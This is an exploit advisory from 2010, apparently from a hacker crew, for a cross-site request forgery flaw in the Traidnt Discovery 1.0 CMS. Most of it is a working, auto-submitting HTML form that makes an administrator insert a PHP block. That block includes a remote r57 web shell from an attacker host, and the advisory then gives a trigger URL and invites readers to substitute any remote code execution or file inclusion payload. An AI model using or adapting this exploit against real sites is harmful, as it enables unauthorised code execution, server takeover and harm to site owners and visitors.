Traidnt Discovery Code Execution / Cross Site Request Forgery

`  
  
# Exploit Title: Traidnt Discovery - [CSRF] inject Blocks With PHP Codes  
# Date: 11-06-2010  
# Author: G0D-F4Th3r  
# Software Link: http://discovery.traidnt.com/demo/  
# Version: 1.0  
# Tested on: http://discovery.traidnt.com/demo/  
  
====================================[form]================================================  
<html>  
<form name="r00t" action="  
http://site/[path]/admincp/blocks.php?do=addnew&go=insert" method="POST">  
<body onload="document.forms.r00t.submit();">  
<input type="hidden" name="name" value="G0D-F4Th3r"/>  
<input type="hidden" name="display" value="1"/>  
<input type="hidden" name="place" value="0"/>  
<input type="hidden" name="php" value="1"/>  
<input type="hidden" name="view" value="0"/>  
<input type="hidden" name="author" value="G0D-F4Th3r"/>  
<input type="hidden" name="link" value="http://site/[path]/"/>  
<input type="hidden" name="code" value="{  
if($_GET['ss']=="sn"){  
include('http://attacker/r57.txt');  
}  
}"/>  
</form>  
</html>  
====================================  
After that open your code :  
http://site/[path]/index.php?ss=sn  
====================================  
Attention:  
You can change this  
{  
if($_GET['ss']=="sn"){  
include('http://attacker/r57.txt');  
}  
}  
to any code with Remote code execution or Local File Inclusion  
It depends to what you like :)  
  
====================================  
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My  
Friends  
  
  
  
`